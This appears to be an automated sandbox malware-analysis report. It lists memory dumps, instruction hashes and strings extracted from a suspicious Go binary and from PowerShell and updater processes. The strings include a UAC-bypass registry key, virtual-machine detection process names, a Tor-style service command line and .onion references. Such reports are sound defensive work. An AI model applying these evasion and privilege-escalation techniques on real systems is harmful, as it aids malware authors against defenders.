                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000011.00000002.4560534739.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                              • Opcode ID: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                              • Opcode Fuzzy Hash: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000011.00000002.4560534739.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000011.00000002.4560534739.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                              • Opcode ID: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                              • Opcode Fuzzy Hash: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cc38d8c52923182ba536bd901a84a032ace2dee20ebc30902dbbdba21461fa81
                                                                                                                                                              • Instruction ID: 4695bcc58a192a0ed70eef9f190dd4827833ad68a93b7531e15296b5dfff608e
                                                                                                                                                              • Opcode Fuzzy Hash: cc38d8c52923182ba536bd901a84a032ace2dee20ebc30902dbbdba21461fa81
                                                                                                                                                              • Instruction Fuzzy Hash: 4F32D630A18A498FDB98EF5CC4A5AA9BBE1FF59314F14017DD44ED7296CA35F842CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8e7ed5a20b514be0ac6c2cff9678bf034f1b6e31be08b064f80f413ada0b2d7d
                                                                                                                                                              • Instruction ID: fc5301bc0ee635c969b836e982d1da967ca53a98f1895fef98b3c52148f0dbf4
                                                                                                                                                              • Opcode Fuzzy Hash: 8e7ed5a20b514be0ac6c2cff9678bf034f1b6e31be08b064f80f413ada0b2d7d
                                                                                                                                                              • Instruction Fuzzy Hash: DEF1A331A0CA4D8FDF98DF5CD4A5AE97BE1FF69300F14416AD449D7296CA38E882C781
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 172a9c1a1569b9cf1dbb3c1af37a60dd34adb0fc83656810b6b4bf9160d41b02
                                                                                                                                                              • Instruction ID: f6cd6ff1fcc6ed2878d37d80fb5ea6d65bb5731a1ea86620801d4f21566c061d
                                                                                                                                                              • Opcode Fuzzy Hash: 172a9c1a1569b9cf1dbb3c1af37a60dd34adb0fc83656810b6b4bf9160d41b02
                                                                                                                                                              • Instruction Fuzzy Hash: 1AE19330A08A4D8FDF94EF58C495AE97BE1FF69314F1441AAD40DD7296DA38EC42CB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d9a8473b25f2966e9c8ec96dbfcf970f81f2253cc63b01de6a13e8f8dceee47a
                                                                                                                                                              • Instruction ID: be7ae23c2d0eb742d38a77571280fb9ec4d42ae47de808000f25200e16cd6555
                                                                                                                                                              • Opcode Fuzzy Hash: d9a8473b25f2966e9c8ec96dbfcf970f81f2253cc63b01de6a13e8f8dceee47a
                                                                                                                                                              • Instruction Fuzzy Hash: 60E1B371A0CE4E8FDF95DF58C4A5AA9BBE1FF5A304F1401B9D009D7286DA38E846D780
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 67333d6dd0162b19a6c170ea8aafb22cfd3a952c5b0b559e268326e3d99e2f75
                                                                                                                                                              • Instruction ID: d7a1e99e1bce1d79ea7b7982406023b86cdf36079cde383af476b32b9c0e2e5e
                                                                                                                                                              • Opcode Fuzzy Hash: 67333d6dd0162b19a6c170ea8aafb22cfd3a952c5b0b559e268326e3d99e2f75
                                                                                                                                                              • Instruction Fuzzy Hash: 66C13C31A18A4D8FDF95EF5CD4A5AE97BE1FFA9300F14416AD409D7295CB38E881CB80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2de7a887fd24565ebfb6b7409f3f48d314341a4aed3c124526a06b4e85118445
                                                                                                                                                              • Instruction ID: fe01195516d824cc71b690222ea9d1533bbfa700d3df518f86c8df46e1ea869b
                                                                                                                                                              • Opcode Fuzzy Hash: 2de7a887fd24565ebfb6b7409f3f48d314341a4aed3c124526a06b4e85118445
                                                                                                                                                              • Instruction Fuzzy Hash: 6F513822B0DA468FEBA9DA5C54B11B477D2EF96230B5800BFC25EC7197DE1CEC058359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
                                                                                                                                                              • Instruction ID: 1d67cea7623b2511cd2c9d80a08de13d4e8d9550d673aea507a88136f15f82e6
                                                                                                                                                              • Opcode Fuzzy Hash: 0e48b26a78407d7d12aa1e21ef8e4f67bef2bfc53f6ba0b8fa22060f3992c208
                                                                                                                                                              • Instruction Fuzzy Hash: CD31143191CB888FDB18DB5C9C4A6A97BE0FB69320F00426FE449D3252DA74A855CBC2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2402980991.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd3477d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f396d30d3a08ca07c7b03d182df04115b43983c4a5f9d4712e4e24b48190fbc9
                                                                                                                                                              • Instruction ID: 225eb2dccf21024d17ec0a5d8ba92b36020353a9387507fbc6b31d5a87017324
                                                                                                                                                              • Opcode Fuzzy Hash: f396d30d3a08ca07c7b03d182df04115b43983c4a5f9d4712e4e24b48190fbc9
                                                                                                                                                              • Instruction Fuzzy Hash: C541267040DBC48FE7568B289C919623FF0EF57320B1945DFD088CB1A3D629B846C7A2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b8b7cecfab0a6b5d54ef97624d38efbeeb71624213e902e0362dbbb905335f10
                                                                                                                                                              • Instruction ID: 0a3cb2b930fb97b33ba848e52e2886bc0001c81f58a7a73e79f183c31481bc79
                                                                                                                                                              • Opcode Fuzzy Hash: b8b7cecfab0a6b5d54ef97624d38efbeeb71624213e902e0362dbbb905335f10
                                                                                                                                                              • Instruction Fuzzy Hash: CF21F13170C9095FEB4CEA1CD8A99B537D0EBAA314B1001AEE44DC7252DD26FC83C781
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
                                                                                                                                                              • Instruction ID: d591b63e0b60cec4ce36873b078e094a3255c4033aa2956d309c48b636028e8d
                                                                                                                                                              • Opcode Fuzzy Hash: c2973ab7cbdd82c847d1c72318bc0482d6615c63ffd76cc4cc56ba9348c435dd
                                                                                                                                                              • Instruction Fuzzy Hash: 7321073190CB4C4FDB59DFACD84A7E97BF0EB96321F04416BD448C3152DA74A816CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: acb9d3e0cbc25c75cc9f1b616fc6af964f5fc302bdac334dbe215dc15888871a
                                                                                                                                                              • Instruction ID: 1d93ff384b2cf0053fd9861a5309b4c6b6c3a82380c18612873d38d4cb44951c
                                                                                                                                                              • Opcode Fuzzy Hash: acb9d3e0cbc25c75cc9f1b616fc6af964f5fc302bdac334dbe215dc15888871a
                                                                                                                                                              • Instruction Fuzzy Hash: 5621E622B4DA468FE7A9DA9C54F117426C2EF9633075900BED25DC71EBCE1CEC049359
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                              • Instruction ID: 76085c6dd3716b73fd176d99b8e85ba88af67c9da9f3be81d669a3198407d212
                                                                                                                                                              • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                                                                                                                              • Instruction Fuzzy Hash: D301677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3651D636E881CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2404315558.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34890000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 13c51ae458ddcd1eeb43a4ae2a3e07a374297d53a93131feea3007a4c5d0f8cb
                                                                                                                                                              • Instruction ID: 205a0f46094506d71f81f954e9c86526e4751f89e4aa50c705046b783dd96ed9
                                                                                                                                                              • Opcode Fuzzy Hash: 13c51ae458ddcd1eeb43a4ae2a3e07a374297d53a93131feea3007a4c5d0f8cb
                                                                                                                                                              • Instruction Fuzzy Hash: A3F0963590C6C98FDB169F2888555D97FE0EF17210B05029BD458C71A2DB649458C782
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: aaf2f4fc88aceabc668cbcb0230df7ce2ea25a4cc71bd7904b5b64d3a49115fa
                                                                                                                                                              • Instruction ID: 2d2e56356d0090021814cb74f162a4614251324e5bc7031616d6ed6300252d5f
                                                                                                                                                              • Opcode Fuzzy Hash: aaf2f4fc88aceabc668cbcb0230df7ce2ea25a4cc71bd7904b5b64d3a49115fa
                                                                                                                                                              • Instruction Fuzzy Hash: 58F0A03131CF044FE748EE2DE44A6A2B3E0FBA8311F10462FE44AC3251DA25E8818782
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000001A.00000002.2405197291.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd34960000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d4c95edb86f8f05fc92e7da881c15be9f2037b29d8773865de8b9479fcbe2503
                                                                                                                                                              • Instruction ID: b11c80e187d6c9565bb305a5247cb67841be4ee61c5215f4d2a84e80499345c4
                                                                                                                                                              • Opcode Fuzzy Hash: d4c95edb86f8f05fc92e7da881c15be9f2037b29d8773865de8b9479fcbe2503
                                                                                                                                                              • Instruction Fuzzy Hash: 8CF05E32A0D5448FDB54EB9CE4A14E877E0FF4633071500BAE25DC75A7DA2AEC54C754
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000027.00000002.2684792797.00007FF7FA991000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF7FA990000, based on PE: true
                                                                                                                                                              • Associated: 00000027.00000002.2684644127.00007FF7FA990000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 00000027.00000002.2685711012.00007FF7FAF21000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 00000027.00000002.2685743760.00007FF7FAF2C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 00000027.00000002.2685797979.00007FF7FAF2F000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 00000027.00000002.2685827421.00007FF7FAF30000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_39_2_7ff7fa990000_updater.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
                                                                                                                                                              • Instruction ID: 433eac7873a37f3a3d597168864bd56f006104c2c5aadf89c85acec81bcdd59e
                                                                                                                                                              • Opcode Fuzzy Hash: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
                                                                                                                                                              • Instruction Fuzzy Hash: FAB09220904209A4F300BF01A881258B6A06B08742F9040B1C51C063A2CBAC90404BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:33%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:39
                                                                                                                                                              Total number of Limit Nodes:7
